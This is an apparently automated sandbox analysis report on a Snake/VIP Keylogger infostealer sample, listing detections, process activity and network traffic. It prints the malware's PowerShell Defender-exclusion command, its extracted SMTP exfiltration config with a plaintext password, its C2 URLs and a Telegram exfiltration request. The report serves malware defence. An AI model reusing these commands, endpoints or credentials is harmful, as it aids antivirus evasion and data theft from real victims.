Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
hesaphareketi-01.exe

Overview

General Information

Sample name:hesaphareketi-01.exe
Analysis ID:1524785
MD5:1a2030277b88a72feac4f57f6514494a
SHA1:29858e377f52ba70fad5d3f24c30e2264d96ea96
SHA256:c387b91dd56a4b66da4582e26ebc0c5a473e37251fb44650fc62d6d4749d5c8c
Tags:exegeoSnakeKeyloggerTURuser-abuse_ch
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • hesaphareketi-01.exe (PID: 5860 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: 1A2030277B88A72FEAC4F57F6514494A)
    • powershell.exe (PID: 3968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1528 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • hesaphareketi-01.exe (PID: 5508 cmdline: "C:\Users\user\Desktop\hesaphareketi-01.exe" MD5: 1A2030277B88A72FEAC4F57F6514494A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2dd80:$a1: get_encryptedPassword
          • 0x2e09d:$a2: get_encryptedUsername
          • 0x2db90:$a3: get_timePasswordChanged
          • 0x2dc99:$a4: get_passwordField
          • 0x2dd96:$a5: set_encryptedPassword
          • 0x2f40e:$a7: get_logins
          • 0x2f371:$a10: KeyLoggerEventArgs
          • 0x2efd6:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 15 entries
          SourceRuleDescriptionAuthorStrings
          4.2.hesaphareketi-01.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            4.2.hesaphareketi-01.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              4.2.hesaphareketi-01.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                4.2.hesaphareketi-01.exe.400000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                  4.2.hesaphareketi-01.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                  • 0x2df80:$a1: get_encryptedPassword
                  • 0x2e29d:$a2: get_encryptedUsername
                  • 0x2dd90:$a3: get_timePasswordChanged
                  • 0x2de99:$a4: get_passwordField
                  • 0x2df96:$a5: set_encryptedPassword
                  • 0x2f60e:$a7: get_logins
                  • 0x2f571:$a10: KeyLoggerEventArgs
                  • 0x2f1d6:$a11: KeyLoggerEventArgsEventHandler
                  Click to see the 26 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5860, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 3968, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5860, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 3968, ProcessName: powershell.exe
                  Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 77.245.159.27, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Users\user\Desktop\hesaphareketi-01.exe, Initiated: true, ProcessId: 5508, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49733
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\hesaphareketi-01.exe", ParentImage: C:\Users\user\Desktop\hesaphareketi-01.exe, ParentProcessId: 5860, ParentProcessName: hesaphareketi-01.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\hesaphareketi-01.exe", ProcessId: 3968, ProcessName: powershell.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T09:11:23.282454+020028033053Unknown Traffic192.168.2.949710188.114.96.3443TCP
                  2024-10-03T09:11:27.310384+020028033053Unknown Traffic192.168.2.949716188.114.96.3443TCP
                  2024-10-03T09:11:33.568265+020028033053Unknown Traffic192.168.2.949728188.114.96.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-03T09:11:21.166324+020028032742Potentially Bad Traffic192.168.2.949708193.122.6.16880TCP
                  2024-10-03T09:11:22.697559+020028032742Potentially Bad Traffic192.168.2.949708193.122.6.16880TCP
                  2024-10-03T09:11:23.933420+020028032742Potentially Bad Traffic192.168.2.949712193.122.6.16880TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                  Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                  Source: 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}
                  Source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "satis@obaambalaj.com.tr", "Password": "Beyza2022", "Host": "mail.obaambalaj.com.tr", "Port": "587", "Version": "4.4"}
                  Source: hesaphareketi-01.exeReversingLabs: Detection: 23%
                  Source: hesaphareketi-01.exeVirustotal: Detection: 60%Perma Link
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: hesaphareketi-01.exeJoe Sandbox ML: detected

                  Location Tracking

                  barindex
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: hesaphareketi-01.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49732 version: TLS 1.2
                  Source: hesaphareketi-01.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: tEaO.pdbSHA256 source: hesaphareketi-01.exe
                  Source: Binary string: tEaO.pdb source: hesaphareketi-01.exe
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 06F6C86Fh0_2_06F6C0F8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 06F6C86Fh0_2_06F6C09A
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 011DF475h4_2_011DF2D8
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 011DF475h4_2_011DF545
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 011DF475h4_2_011DF4C4
                  Source: C:\Users\user\Desktop\hesaphareketi-01.exeCode function: 4x nop then jmp 011DFC31h4_2_011DF979

                  Networking

                  barindex
                  Source: unknownDNS query: name: api.telegram.org
                  Source: Yara matchFile source: 4.2.hesaphareketi-01.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.4917370.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.hesaphareketi-01.exe.477ad90.3.raw.unpack, type: UNPACKEDPE
                  Source: global trafficTCP traffic: 192.168.2.9:49733 -> 77.245.159.27:587
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                  Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                  Source: Joe Sandbox ViewASN Name: NIOBEBILISIMHIZMETLERITR NIOBEBILISIMHIZMETLERITR
                  Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: checkip.dyndns.org
                  Source: unknownDNS query: name: reallyfreegeoip.org
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49712 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49708 -> 193.122.6.168:80
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49710 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49716 -> 188.114.96.3:443
                  Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49728 -> 188.114.96.3:443
                  Source: global trafficTCP traffic: 192.168.2.9:49733 -> 77.245.159.27:587
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49709 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20and%20Time:%2003/10/2024%20/%2019:12:44%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20581804%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: mail.obaambalaj.com.tr
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 03 Oct 2024 07:11:36 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://aborters.duckdns.org:8081
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anotherarmy.dns.army:8081
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E8C000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.obaambalaj.com.tr
                  Source: hesaphareketi-01.exe, 00000000.00000002.1457581741.0000000002ED2000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002D21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: hesaphareketi-01.exe, 00000000.00000002.1458561793.00000000046EA000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3893452216.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:581804%0D%0ADate%20a
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002E27000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3895077200.0000000002ECA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FDF000.00000004.00000800.00020000.00000000.sdmp, hesaphareketi-01.exe, 00000004.00000002.3897670994.0000000003FC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
